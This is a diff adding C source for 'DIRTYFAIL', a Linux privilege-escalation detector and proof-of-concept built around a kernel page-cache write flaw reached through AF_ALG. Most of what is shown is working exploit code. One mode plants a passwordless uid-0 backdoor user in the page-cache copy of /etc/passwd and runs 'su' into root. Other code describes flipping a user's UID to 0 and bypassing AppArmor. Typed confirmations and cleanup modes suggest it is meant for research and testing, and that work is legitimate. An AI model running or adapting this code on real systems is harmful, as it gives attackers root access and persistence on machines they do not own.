VICTIM_LINE / TARGET_LINE not set"); + return DF_TEST_ERROR; + } + off_t line_off = (off_t)atoll(off_s); + size_t len = strlen(victim_s); + if (strlen(target_s) != len) { + log_bad("inner: victim/target lengths differ (%zu vs %zu)", + len, strlen(target_s)); + return DF_TEST_ERROR; + } + if 
(!apply_flips(line_off, victim_s, target_s, len)) { + return DF_EXPLOIT_FAIL; + } + return DF_EXPLOIT_OK; +} + +df_result_t backdoor_cleanup_inner(void) +{ + const char *off_s = getenv("DIRTYFAIL_LINE_OFF"); + const char *victim_s = getenv("DIRTYFAIL_VICTIM_LINE"); + const char *target_s = getenv("DIRTYFAIL_TARGET_LINE"); + if (!off_s || !victim_s || !target_s) { + log_bad("inner-cleanup: env vars not set"); + return DF_TEST_ERROR; + } + off_t line_off = (off_t)atoll(off_s); + size_t len = strlen(victim_s); + if (!apply_flips(line_off, target_s, victim_s, len)) { /* reverse direction */ + return DF_EXPLOIT_FAIL; + } + return DF_EXPLOIT_OK; +} + +/* ---- OUTER (init ns) β€” find_victim, save_state, fork bypass child --- */ + +df_result_t backdoor_install(bool do_shell) +{ + log_step("Persistent backdoor β€” install"); + + /* Did we already install? Check via getpwnam. */ + struct passwd *pw = getpwnam(NEW_USER); + if (pw && pw->pw_uid == 0) { + log_ok("'%s' already in /etc/passwd as uid 0", NEW_USER); + if (!do_shell) return DF_EXPLOIT_OK; + log_ok("invoking 'su - %s'", NEW_USER); + execlp("su", "su", "-", NEW_USER, (char *)NULL); + return DF_EXPLOIT_FAIL; + } + + struct victim v; + memset(&v, 0, sizeof(v)); + if (!find_victim(&v)) { + log_bad("no nologin victim line found in /etc/passwd"); + return DF_TEST_ERROR; + } + log_step("victim line: '%s' at offset %lld (%zu bytes)", + v.name, (long long)v.line_off, v.line_len); + + /* Build replacement, same length. 
*/ + size_t fixed_len = strlen(DF_PREFIX) + strlen(DF_SUFFIX); + if (v.line_len < fixed_len) { + log_bad("victim line too short (%zu) for dirtyfail replacement (need >= %zu)", + v.line_len, fixed_len); + return DF_TEST_ERROR; + } + size_t pad_len = v.line_len - fixed_len; + char target[512]; + char *p = target; + memcpy(p, DF_PREFIX, strlen(DF_PREFIX)); p += strlen(DF_PREFIX); + memset(p, 'X', pad_len); p += pad_len; + memcpy(p, DF_SUFFIX, strlen(DF_SUFFIX)); p += strlen(DF_SUFFIX); + *p = '\0'; + + log_step("replacement: '%s'", target); + log_warn("about to length-match overwrite '%s' β†’ '%s' (%zu bytes)", + v.name, NEW_USER, v.line_len); + log_warn("ON-DISK /etc/passwd is unchanged. State stashed at %s.", STATE_FILE); + if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; } + + if (!save_state(v.line_off, v.line, v.line_len)) return DF_TEST_ERROR; + + /* Hand off to inner via env vars. */ + char off_str[32]; + snprintf(off_str, sizeof(off_str), "%lld", (long long)v.line_off); + setenv("DIRTYFAIL_INNER_MODE", "backdoor-install", 1); + setenv("DIRTYFAIL_LINE_OFF", off_str, 1); + setenv("DIRTYFAIL_VICTIM_LINE", v.line, 1); + setenv("DIRTYFAIL_TARGET_LINE", target, 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); + if (rc != DF_EXPLOIT_OK) { + log_bad("inner backdoor-install failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + /* Verify in init ns */ + if (!(pw = getpwnam(NEW_USER)) || pw->pw_uid != 0) { + log_bad("post-flip getpwnam(%s) doesn't show uid 0 β€” install failed", + NEW_USER); + return DF_EXPLOIT_FAIL; + } + log_ok("'%s' is now uid 0 in the page cache copy of /etc/passwd", + NEW_USER); + log_hint("state stashed at %s β€” run 'dirtyfail --cleanup-backdoor' to revert", + STATE_FILE); + + if (!do_shell) return DF_EXPLOIT_OK; + log_ok("invoking 'su - %s' in init ns (PAM nullok β†’ REAL ROOT)", NEW_USER); + execlp("su", "su", "-", NEW_USER, (char *)NULL); + log_bad("execlp: %s", strerror(errno)); + return 
DF_EXPLOIT_FAIL; +} + +df_result_t backdoor_cleanup(void) +{ + log_step("Persistent backdoor β€” cleanup"); + + off_t line_off = 0; + char victim_line[512]; + size_t victim_len = 0; + if (!load_state(&line_off, victim_line, sizeof(victim_line), &victim_len)) { + log_bad("no usable state file at %s", STATE_FILE); + return DF_TEST_ERROR; + } + log_step("restoring %zu bytes at offset %lld", victim_len, (long long)line_off); + + /* Read CURRENT bytes (post-install) so we know what to flip back from. */ + int fd = open("/etc/passwd", O_RDONLY); + if (fd < 0) { log_bad("open passwd: %s", strerror(errno)); return DF_TEST_ERROR; } + char cur[512]; + if (pread(fd, cur, victim_len, line_off) != (ssize_t)victim_len) { + log_bad("pread: %s", strerror(errno)); + close(fd); return DF_TEST_ERROR; + } + close(fd); + cur[victim_len] = '\0'; + + /* Hand off to inner. inner runs apply_flips(off, target=cur, victim=victim_line) + * to flip back from current state to original. */ + char off_str[32]; + snprintf(off_str, sizeof(off_str), "%lld", (long long)line_off); + setenv("DIRTYFAIL_INNER_MODE", "backdoor-cleanup", 1); + setenv("DIRTYFAIL_LINE_OFF", off_str, 1); + setenv("DIRTYFAIL_VICTIM_LINE", victim_line, 1); + setenv("DIRTYFAIL_TARGET_LINE", cur, 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); + if (rc != DF_EXPLOIT_OK) { + log_bad("inner backdoor-cleanup failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + unlink(STATE_FILE); + log_ok("backdoor cleaned β€” line restored, state file removed"); + +#ifdef POSIX_FADV_DONTNEED + int e = open("/etc/passwd", O_RDONLY); + if (e >= 0) { posix_fadvise(e, 0, 0, POSIX_FADV_DONTNEED); close(e); } +#endif + return DF_OK; +} diff --git a/modules/copy_fail_family/backdoor.h b/modules/copy_fail_family/backdoor.h new file mode 100644 index 0000000..adace78 --- /dev/null +++ b/modules/copy_fail_family/backdoor.h @@ -0,0 +1,59 @@ +/* + * DIRTYFAIL β€” backdoor.h + * + * Persistent uid-0 backdoor in the /etc/passwd page cache. 
+ * + * MORE INVASIVE than the UID-flip exploits in copyfail.c / + * dirtyfrag_esp.c / dirtyfrag_rxrpc.c. Where those modify the calling + * user's UID for one shell session, this mode inserts a brand-new + * passwordless uid-0 user "dirtyfail" by length-matched overwrite of + * an existing nologin/false/sync line. The substituted line stays in + * the page cache until eviction, so: + * + * ./dirtyfail --exploit-backdoor # install + drop into root + * exit # back to your normal shell + * su - dirtyfail # any user, any time β†’ root + * + * The username "dirtyfail" is intentionally chosen to match this + * project β€” anyone auditing /etc/passwd will spot it immediately, + * which is the opposite of stealth-by-default. If you need an + * undetectable backdoor for an authorized red-team engagement, + * change NEW_USER in backdoor.c. + * + * The on-disk /etc/passwd is unchanged. State (LINE_OFF, original + * VICTIM_LINE) is persisted at /var/tmp/.dirtyfail.state so that + * `--cleanup-backdoor` can restore the original line byte-by-byte + * via the same 1-byte primitive. + * + * This mode requires the GCM single-byte primitive (`cfg_1byte_write`) + * to land arbitrary bytes at arbitrary offsets β€” the 4-byte authencesn + * primitive can't easily rewrite a 50-byte line that doesn't align + * to 4-byte boundaries. + * + * Technique credit: 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo + * (`run.sh`); reimplemented here as a single C function. + */ + +#ifndef DIRTYFAIL_BACKDOOR_H +#define DIRTYFAIL_BACKDOOR_H + +#include "common.h" + +df_result_t backdoor_install(bool do_shell); +df_result_t backdoor_cleanup(void); + +/* INNER variants β€” run inside the AA bypass userns. 
The inner reads + * the operation parameters from env vars set by the outer: + * DIRTYFAIL_INNER_MODE = backdoor-install | backdoor-cleanup + * DIRTYFAIL_LINE_OFF = byte offset of the victim line + * DIRTYFAIL_VICTIM_LINE = original /etc/passwd line bytes + * DIRTYFAIL_TARGET_LINE = (install only) replacement bytes + */ +df_result_t backdoor_install_inner(void); +df_result_t backdoor_cleanup_inner(void); + +/* Used by --list-state. Returns true if a backdoor state file is present + * (and prints a summary), false if no file exists. Side-effect free. */ +bool backdoor_list_state(void); + +#endif diff --git a/modules/copy_fail_family/common.c b/modules/copy_fail_family/common.c new file mode 100644 index 0000000..7458b21 --- /dev/null +++ b/modules/copy_fail_family/common.c @@ -0,0 +1,362 @@ +/* + * DIRTYFAIL β€” common.c + * + * Tiny utility surface shared by the detectors and exploiters. Nothing + * here is CVE-specific β€” that lives in copyfail.c, dirtyfrag_esp.c and + * dirtyfrag_rxrpc.c. + */ + +#include "common.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#ifdef __linux__ +#include +#endif + +/* On glibc +_GNU_SOURCE provides these. macOS lacks them; we + * still want this file to parse under macOS clang for static analysis, + * so the unprivileged_userns_allowed body itself is platform-guarded. */ +#ifndef CLONE_NEWUSER +#define CLONE_NEWUSER 0x10000000 +#endif + +bool dirtyfail_use_color = true; +bool dirtyfail_active_probes = false; +bool dirtyfail_no_revert = false; +bool dirtyfail_json = false; + +static void vlog(FILE *out, const char *prefix, const char *color, + const char *fmt, va_list ap) +{ + if (dirtyfail_use_color && color) + fprintf(out, "\033[%sm%s\033[0m ", color, prefix); + else + fprintf(out, "%s ", prefix); + vfprintf(out, fmt, ap); + fputc('\n', out); + /* Flush β€” when stdout is piped (e.g. 
through ssh, timeout, tee) + * the default fully-buffered mode hides log lines until either the + * process exits cleanly or 4 KiB accumulates. We log to follow + * progress; visibility wins over throughput here. */ + fflush(out); +} + +/* In --json mode, all log output goes to stderr so stdout stays a + * clean JSON document for downstream parsers. Outside --json mode, + * we keep the original split (info/progress to stdout, errors to + * stderr) for human readability. */ +#define LOG_FN(name, prefix, color, default_stream) \ + void name(const char *fmt, ...) { \ + FILE *_s = dirtyfail_json ? stderr : (default_stream); \ + va_list ap; va_start(ap, fmt); \ + vlog(_s, prefix, color, fmt, ap); \ + va_end(ap); \ + } + +LOG_FN(log_step, "[*]", "1;36", stdout) /* cyan */ +LOG_FN(log_ok, "[+]", "1;32", stdout) /* green */ +LOG_FN(log_bad, "[-]", "1;31", stderr) /* red */ +LOG_FN(log_warn, "[!]", "1;33", stderr) /* yellow*/ +LOG_FN(log_hint, "[i]", "0;37", stdout) /* dim */ + +/* ------------------------------------------------------------------ */ + +bool kernel_version(int *major, int *minor) +{ + struct utsname u; + if (uname(&u) != 0) return false; + /* release looks like "6.12.0-124.49.1.el10_1.x86_64" β€” split on dots. */ + char *dot1 = strchr(u.release, '.'); + if (!dot1) return false; + *dot1 = '\0'; + *major = atoi(u.release); + char *dot2 = strchr(dot1 + 1, '.'); + if (dot2) *dot2 = '\0'; + *minor = atoi(dot1 + 1); + return true; +} + +bool kmod_loaded(const char *name) +{ + FILE *f = fopen("/proc/modules", "r"); + if (!f) return false; + char line[512]; + size_t nlen = strlen(name); + bool found = false; + while (fgets(line, sizeof(line), f)) { + if (strncmp(line, name, nlen) == 0 && line[nlen] == ' ') { + found = true; + break; + } + } + fclose(f); + return found; +} + +/* Probe by spawning a child. Doing it inline would either succeed (and + * leave us in a fresh userns for the rest of the run, breaking later + * checks) or fail and leave errno polluted. 
The fork is cheap enough. + * + * We use syscall(SYS_unshare) rather than the libc wrapper so this + * compiles on toolchains where doesn't expose unshare(). */ +bool unprivileged_userns_allowed(void) +{ +#ifdef __linux__ + pid_t pid = fork(); + if (pid < 0) return false; + if (pid == 0) { + if (syscall(SYS_unshare, CLONE_NEWUSER) == 0) _exit(0); + _exit(1); + } + int wstatus = 0; + waitpid(pid, &wstatus, 0); + return WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 0; +#else + return false; /* macOS analysis path β€” never executed in production */ +#endif +} + +bool find_passwd_uid_field(const char *username, + off_t *uid_off, size_t *uid_len, + char *uid_str) +{ + int fd = open("/etc/passwd", O_RDONLY); + if (fd < 0) return false; + + struct stat st; + if (fstat(fd, &st) < 0) { close(fd); return false; } + + char *buf = malloc(st.st_size + 1); + if (!buf) { close(fd); return false; } + ssize_t got = read(fd, buf, st.st_size); + close(fd); + if (got <= 0) { free(buf); return false; } + buf[got] = '\0'; + + bool found = false; + size_t ulen = strlen(username); + char *line = buf; + while (line < buf + got) { + if (strncmp(line, username, ulen) == 0 && line[ulen] == ':') { + /* user:x:UID:GID:... β€” skip 2 colons to land on UID start. 
*/ + char *p = line + ulen + 1; + char *colon = strchr(p, ':'); + if (!colon) break; + char *uid_start = colon + 1; + char *uid_end = strchr(uid_start, ':'); + if (!uid_end) break; + size_t len = uid_end - uid_start; + if (len >= 16) break; + *uid_off = uid_start - buf; + *uid_len = len; + memcpy(uid_str, uid_start, len); + uid_str[len] = '\0'; + found = true; + break; + } + char *nl = strchr(line, '\n'); + if (!nl) break; + line = nl + 1; + } + free(buf); + return found; +} + +bool drop_caches(void) +{ + int fd = open("/proc/sys/vm/drop_caches", O_WRONLY); + if (fd < 0) return false; + ssize_t n = write(fd, "3\n", 2); + close(fd); + return n == 2; +} + +void hex_dump(const unsigned char *buf, size_t len) +{ + for (size_t i = 0; i < len; i += 16) { + printf(" %04zx ", i); + for (size_t j = 0; j < 16; j++) { + if (i + j < len) printf("%02x ", buf[i + j]); + else printf(" "); + } + printf(" |"); + for (size_t j = 0; j < 16 && i + j < len; j++) { + unsigned char c = buf[i + j]; + putchar(isprint(c) ? c : '.'); + } + printf("|\n"); + } +} + +/* + * authenc keyblob layout (see crypto/authenc.c::crypto_authenc_setkey): + * + * struct rtattr { __u16 rta_len; __u16 rta_type; } = 4 bytes + * __be32 enckeylen = 4 bytes + * authkey[authkeylen] + * enckey [enckeylen] + * + * rta_len in the rtattr counts the rtattr header *plus* the enckeylen + * field, so it is always 8. 
+ */ +size_t build_authenc_keyblob(unsigned char *out, + const unsigned char *authkey, size_t authkeylen, + const unsigned char *enckey, size_t enckeylen) +{ + /* struct rtattr { u16 rta_len; u16 rta_type; } */ + out[0] = 8; out[1] = 0; + out[2] = CRYPTO_AUTHENC_KEYA_PARAM; + out[3] = 0; + /* __be32 enckeylen */ + out[4] = (enckeylen >> 24) & 0xff; + out[5] = (enckeylen >> 16) & 0xff; + out[6] = (enckeylen >> 8) & 0xff; + out[7] = (enckeylen ) & 0xff; + memcpy(out + 8, authkey, authkeylen); + memcpy(out + 8 + authkeylen, enckey, enckeylen); + return 8 + authkeylen + enckeylen; +} + +bool typed_confirm(const char *expected) +{ + char buf[128]; + printf(" Type \033[1;33m%s\033[0m and press enter to proceed: ", expected); + fflush(stdout); + if (!fgets(buf, sizeof(buf), stdin)) return false; + /* strip trailing newline */ + size_t n = strlen(buf); + while (n > 0 && (buf[n-1] == '\n' || buf[n-1] == '\r')) buf[--n] = '\0'; + return strcmp(buf, expected) == 0; +} + +static uid_t read_outer_id(const char *path) +{ + int fd = open(path, O_RDONLY); + if (fd < 0) return (uid_t)-1; + char buf[256]; + ssize_t n = read(fd, buf, sizeof(buf) - 1); + close(fd); + if (n <= 0) return (uid_t)-1; + buf[n] = '\0'; + /* Format: " ". For init namespace, this is + * "0 0 4294967295" β€” outer == 0 == real root. For our userns it's + * "0 1000 1" β€” outer == 1000 == real uid. */ + int inner = -1, outer = -1, count = 0; + if (sscanf(buf, "%d %d %d", &inner, &outer, &count) != 3 || inner != 0) + return (uid_t)-1; + return (uid_t)outer; +} + +uid_t real_uid_for_target(void) +{ + uid_t outer = read_outer_id("/proc/self/uid_map"); + /* If we're root in the init namespace OR no userns β€” return getuid(). + * The init namespace map shows "0 0 4294967295" β†’ outer=0; only + * trust an outer != 0 (and != -1) as the bypass-userns case. 
*/ + if (outer == (uid_t)-1) return getuid(); + if (outer == 0) return getuid(); + return outer; +} + +gid_t real_gid_for_target(void) +{ + uid_t outer = read_outer_id("/proc/self/gid_map"); + if (outer == (uid_t)-1) return getgid(); + if (outer == 0) return getgid(); + return (gid_t)outer; +} + +/* Best-effort eviction of /etc/passwd from the page cache. Used by + * the --no-shell path to revert the page-cache modification after a + * successful exploit + verify. + * + * The naive `posix_fadvise(POSIX_FADV_DONTNEED)` is unreliable here: + * since Linux 6.3, fadvise requires write access to the file, and we + * typically don't have write access to /etc/passwd from inside the + * AA bypass userns (root in userns maps to overflow uid in init ns, + * which doesn't own the file). + * + * So we try in order: + * 1. posix_fadvise on a fresh O_RDONLY fd (best case) + * 2. sudo drop_caches via the system shell β€” works if the user has + * passwordless sudo, which is common on test VMs but a + * reasonable assumption to fail closed on + * + * Returns true if the cache was definitely cleared, false otherwise. + * Caller should treat false as "page cache may still be modified β€” + * tell the user to reboot if their session breaks". */ +bool try_revert_passwd_page_cache(void) +{ + bool ok = false; +#ifdef POSIX_FADV_DONTNEED + int fd = open("/etc/passwd", O_RDONLY); + if (fd >= 0) { + if (posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED) == 0) ok = true; + close(fd); + } +#endif + + /* Even if fadvise returned 0, modern kernels silently no-op when + * we lack write access β€” verify by re-reading and comparing to + * what's on disk via O_DIRECT. Too fiddly. Just always also try + * drop_caches as belt+suspenders. 
*/ + int rc = system("sudo -n /bin/sh -c 'echo 3 > /proc/sys/vm/drop_caches' " + ">/dev/null 2>&1"); + if (rc == 0) ok = true; + return ok; +} + +bool ssh_lockout_check(const char *target_user) +{ + const char *ssh_conn = getenv("SSH_CONNECTION"); + if (!ssh_conn || !*ssh_conn) return true; /* not over SSH */ + + const char *user = getenv("USER"); + if (!user) { + struct passwd *pw = getpwuid(real_uid_for_target()); + user = pw ? pw->pw_name : ""; + } + if (strcmp(user, target_user) != 0) return true; /* different user */ + + log_warn("================================================================="); + log_warn(" SSH LOCKOUT WARNING"); + log_warn("================================================================="); + log_warn(" You are running this exploit OVER SSH against your OWN account."); + log_warn(" The page-cache write will mark '%s' as uid 0 in /etc/passwd.", + target_user); + log_warn(" Once that lands:"); + log_warn(" - sshd looks up '%s', sees uid 0", target_user); + log_warn(" - StrictModes rejects ~/.ssh/authorized_keys (owner uid 1000"); + log_warn(" != logging-in uid 0) β†’ publickey auth fails"); + log_warn(" - PAM password auth also fails (uid mismatch)"); + log_warn(" Recovery requires console access to drop_caches or reboot."); + log_warn(" If this is what you want, type YES_BREAK_SSH below."); + log_warn(" Otherwise consider --exploit-backdoor (targets a nologin line"); + log_warn(" instead of your account, doesn't break SSH)."); + log_warn("================================================================="); + + return typed_confirm("YES_BREAK_SSH"); +} + +int open_and_cache(const char *path) +{ + int fd = open(path, O_RDONLY); + if (fd < 0) return -1; + /* Force a read so the page is in the cache. The exploit primitives + * all assume the target page is already populated. We don't care + * what the bytes are or whether read returns short β€” only that the + * kernel pulled the page into the cache as a side effect. 
*/ + char tmp[4096]; + if (read(fd, tmp, sizeof(tmp)) < 0) { + /* primer failed; caller's splice will surface a useful errno. */ + } + lseek(fd, 0, SEEK_SET); + return fd; +} diff --git a/modules/copy_fail_family/common.h b/modules/copy_fail_family/common.h new file mode 100644 index 0000000..53dd477 --- /dev/null +++ b/modules/copy_fail_family/common.h @@ -0,0 +1,197 @@ +/* + * DIRTYFAIL β€” common.h + * + * Shared declarations for the DIRTYFAIL detector + PoC binary. + * + * This file is intentionally light: AF_ALG / SOL_ALG constants that older + * libcs do not export, log macros that respect --no-color, and the + * type definitions used by every CVE module. + */ + +#ifndef DIRTYFAIL_COMMON_H +#define DIRTYFAIL_COMMON_H + +/* The Makefile passes -D_GNU_SOURCE on the command line; this guard + * keeps gcc from warning about a duplicate definition when callers + * include common.h after the cmdline -D has already taken effect. */ +#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* ------------------------------------------------------------------ * + * AF_ALG constants + * + * These are upstream in , but plenty of distros ship + * stale headers. Declare locally so DIRTYFAIL builds on every target + * we have run it against (Ubuntu 22.04 β†’ 24.04, RHEL 9/10, Fedora 42+). 
+ * ------------------------------------------------------------------ */ +#ifndef AF_ALG +#define AF_ALG 38 +#endif +#ifndef SOL_ALG +#define SOL_ALG 279 +#endif +#define ALG_SET_KEY 1 +#define ALG_SET_IV 2 +#define ALG_SET_OP 3 +#define ALG_SET_AEAD_ASSOCLEN 4 +#define ALG_SET_AEAD_AUTHSIZE 5 +#define ALG_OP_DECRYPT 0 +#define ALG_OP_ENCRYPT 1 +#define CRYPTO_AUTHENC_KEYA_PARAM 1 /* rtattr type, */ + +struct sockaddr_alg_compat { + unsigned short salg_family; + unsigned char salg_type[14]; + unsigned int salg_feat; + unsigned int salg_mask; + unsigned char salg_name[64]; +}; + +/* ------------------------------------------------------------------ * + * Logging + * + * DIRTYFAIL output is meant to be skim-readable by a researcher *and* + * grep-friendly in CI. We use a small set of fixed prefixes so that + * automation can match on lines without parsing color escapes: + * + * [*] step / status [+] good news / detection result + * [-] bad news [!] attention / VULNERABLE + * [i] hint [?] prompt + * ------------------------------------------------------------------ */ +extern bool dirtyfail_use_color; + +/* When true, --scan and --check-* modes do an active sentinel-file STORE + * probe per mode in addition to precondition checks. Set by --active. */ +extern bool dirtyfail_active_probes; + +/* When true, --no-shell mode skips the auto-revert step β€” the page-cache + * plant survives until --cleanup or drop_caches. Used by the + * container-escape demo to show that the corruption crosses namespace + * boundaries. Set by --no-revert. */ +extern bool dirtyfail_no_revert; + +/* When true, --scan emits a single JSON object on stdout (suitable for + * SIEM/fleet ingestion); all log output (banner, step/ok/bad/warn/hint) + * is redirected to stderr. Set by --json. */ +extern bool dirtyfail_json; + +void log_step (const char *fmt, ...) __attribute__((format(printf, 1, 2))); +void log_ok (const char *fmt, ...) 
__attribute__((format(printf, 1, 2))); +void log_bad (const char *fmt, ...) __attribute__((format(printf, 1, 2))); +void log_warn (const char *fmt, ...) __attribute__((format(printf, 1, 2))); +void log_hint (const char *fmt, ...) __attribute__((format(printf, 1, 2))); + +/* ------------------------------------------------------------------ * + * Result codes returned by every detector / exploiter. + * + * They map onto exit codes used by the top-level binary so that CI + * pipelines can branch on them without parsing stdout: + * + * DF_OK exit 0 not vulnerable + * DF_VULNERABLE exit 2 vulnerable (detector confirmed primitive) + * DF_PRECOND_FAIL exit 0 prerequisites missing β†’ not vulnerable here + * DF_TEST_ERROR exit 1 could not determine + * DF_EXPLOIT_OK exit 0 exploit succeeded (root achieved) + * DF_EXPLOIT_FAIL exit 3 exploit attempted but did not land + * + * Detectors should never return DF_EXPLOIT_*; exploiters should never + * return DF_PRECOND_FAIL (they assume the detector ran first). + * ------------------------------------------------------------------ */ +typedef enum { + DF_OK = 0, + DF_VULNERABLE = 2, + DF_PRECOND_FAIL = 4, + DF_TEST_ERROR = 1, + DF_EXPLOIT_OK = 5, + DF_EXPLOIT_FAIL = 3, +} df_result_t; + +/* ------------------------------------------------------------------ * + * Utilities (common.c) + * ------------------------------------------------------------------ */ + +/* Parse uname(2)->release into (major, minor). Returns false on parse error. */ +bool kernel_version(int *major, int *minor); + +/* Read /proc/modules and return true if `name` is loaded. Returns false + * (and sets errno) if /proc/modules cannot be opened. */ +bool kmod_loaded(const char *name); + +/* Best-effort: can the calling user create a user namespace? + * forks a child that calls unshare(CLONE_NEWUSER) and reports back. */ +bool unprivileged_userns_allowed(void); + +/* Find current user's UID/GID field offsets in /etc/passwd. 
 + * uid_off, uid_len: byte offset and string length of UID field + * uid_str: caller-supplied buffer >= 16 bytes; receives current UID + * Returns false if /etc/passwd cannot be read, the user is not found, + * or the UID field is 16 or more characters. The field length is not + * otherwise validated; callers that need a 4-digit UID must check + * uid_len themselves. */ +bool find_passwd_uid_field(const char *username, + off_t *uid_off, size_t *uid_len, + char *uid_str); + +/* Drop the kernel page cache. Requires root. */ +bool drop_caches(void); + +/* Best-effort eviction of /etc/passwd from page cache. Tries + * POSIX_FADV_DONTNEED, then `sudo drop_caches` as belt-and-suspenders. + * Returns true if at least one path succeeded. See common.c for + * caveats. */ +bool try_revert_passwd_page_cache(void); + +/* Print a hex+ASCII dump (max `len` bytes). For debug output. */ +void hex_dump(const unsigned char *buf, size_t len); + +/* Build the rtattr-prefixed authenc keyblob expected by ALG_SET_KEY for + * authencesn(hmac(sha256), cbc(aes)). `out` must be >= 8+authkeylen+enckeylen. + * Returns total bytes written. */ +size_t build_authenc_keyblob(unsigned char *out, + const unsigned char *authkey, size_t authkeylen, + const unsigned char *enckey, size_t enckeylen); + +/* Prompt the user to type the literal string `expected` and press enter. + * Returns true only on exact match. Used as a last-line gate before + * --exploit modifies real system state. */ +bool typed_confirm(const char *expected); + +/* Convenience: open `path` RO and return a freshly-cached fd. + * The page-cache primitives below all assume the page is hot. */ +int open_and_cache(const char *path); + +/* Return the user's real (outer) uid, defeating the userns illusion. + * + * After the AppArmor bypass enters us into a fresh user namespace with + * uid_map "0 <outer> 1", `getuid()` returns 0 inside the namespace — + * which lies to exploit code that wants to know which user account to + * target in /etc/passwd. This helper reads /proc/self/uid_map; if it + * shows a non-identity mapping like "0 1000 1", returns the outer uid + * (1000). 
Otherwise (init namespace, or no userns at all) returns + * `getuid()`. + * + * Same idea for real_gid_for_target. */ +uid_t real_uid_for_target(void); +gid_t real_gid_for_target(void); + +/* If $SSH_CONNECTION is set AND `target_user` is the SSH login user, + * the user-uid-flip exploits about to fire will lock the operator out + * of SSH (sshd reads modified /etc/passwd, sees uid 0, then StrictModes + * rejects ~/.ssh/authorized_keys because file owner != logging-in uid). + * The lockout persists until the page cache is evicted β€” typically only + * a reboot recovers, since drop_caches needs root. + * + * Emit a loud warning and require an extra typed_confirm("YES_BREAK_SSH"). + * Returns true to proceed, false to abort. Always returns true when not + * over SSH or when the target user differs from $USER. */ +bool ssh_lockout_check(const char *target_user); + +#endif /* DIRTYFAIL_COMMON_H */ diff --git a/modules/copy_fail_family/copyfail.c b/modules/copy_fail_family/copyfail.c new file mode 100644 index 0000000..4460031 --- /dev/null +++ b/modules/copy_fail_family/copyfail.c @@ -0,0 +1,451 @@ +/* + * DIRTYFAIL β€” copyfail.c β€” CVE-2026-31431 ("Copy Fail") + * + * Detector + opt-in PoC. + * + * BACKGROUND + * ---------- + * The Linux kernel's authencesn(hmac(sha256), cbc(aes)) AEAD template + * performs a 4-byte "scratch" copy at the end of its destination + * scatterlist as part of moving the ESN sequence-number high bits + * around. The crypto code assumes src and dst point at kernel-private + * memory. They do β€” except when the AF_ALG socket family is used: + * algif_aead lets userspace splice() pages into the request, and the + * AEAD primitive runs in-place. By splicing a page-cache page from a + * readable file into the request, the scratch write lands in that page + * cache. The on-disk file is untouched, but the kernel (and every + * subsequent reader) sees the modified copy until the page is evicted. 
+ * + * The 4 bytes that get written are bytes 4..7 of the AAD ("seqno_lo" + * in the ESP header layout), which userspace controls directly. Net + * result: an unprivileged 4-byte arbitrary-offset write into any + * world-readable file's page cache. + * + * DETECTION STRATEGY + * ------------------ + * We never touch system files in detection. Instead we: + * 1. Confirm AF_ALG + authencesn(...) can be instantiated. + * 2. Create a sentinel file in $TMPDIR and fault its first page in. + * 3. Run the exact primitive against the sentinel file with a + * recognizable marker ("PWND") in seqno_lo. + * 4. Re-read the sentinel and look for the marker bytes. + * + * If the marker shows up: the kernel just wrote attacker-controlled + * bytes into a page-cache page over an unmodified disk file. That is + * the entire vulnerability. Vulnerable. + * + * EXPLOIT STRATEGY + * ---------------- + * /etc/passwd is world-readable and contains a 4-digit UID for normal + * users (1000-9999). Flipping that UID to "0000" in the page cache + * makes glibc's getpwnam() report uid=0 for our user. PAM (which still + * checks /etc/shadow on disk, untouched) accepts the real password, + * and then setuid(0) lands us at root. Single 4-byte write, fully + * reversible with POSIX_FADV_DONTNEED. + */ + +#include "copyfail.h" + +#include +#include +#include +#include + +/* These macros come from on Linux but vary across libcs. */ +#ifndef MSG_MORE +#define MSG_MORE 0x8000 +#endif + +#ifdef __linux__ +extern ssize_t splice(int, loff_t *, int, loff_t *, size_t, unsigned int); +#else +/* macOS analysis stub β€” never called at runtime. 
*/ +static ssize_t splice(int a, void *b, int c, void *d, size_t e, unsigned f) +{ (void)a; (void)b; (void)c; (void)d; (void)e; (void)f; errno = ENOSYS; return -1; } +#endif + +#define PAGE 4096 +#define ASSOCLEN 8 /* SPI(4) || seqno_lo(4) */ +#define CRYPTLEN 16 /* one AES block */ +#define TAGLEN 16 /* truncated HMAC-SHA256 */ +#define SPLICE_LEN (CRYPTLEN + TAGLEN) +#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))" +#define MARKER_STR "PWND" + +/* ---------------------------------------------------------------- * + * af_alg_setup_socket() + * + * Creates the master AF_ALG socket, binds it to authencesn, sets a + * zero key (auth+enc), and accept(2)s an op socket. Returns the op fd + * (or -1 with errno set). On success the master fd is closed before + * return β€” we only need the op socket for the actual transaction. + * ---------------------------------------------------------------- */ +static int af_alg_setup_socket(void) +{ + int master = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (master < 0) return -1; + + struct sockaddr_alg_compat sa = { .salg_family = AF_ALG }; + strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1); + strncpy((char *)sa.salg_name, ALG_NAME, sizeof(sa.salg_name) - 1); + if (bind(master, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + close(master); + return -1; + } + + /* Auth key (HMAC-SHA256) is 32 bytes; cipher key (AES-128) is 16. + * We pick zero for both β€” auth verification will fail at the end + * (EBADMSG), but the buggy scratch-write fires *before* that, so + * the page-cache modification persists either way. 
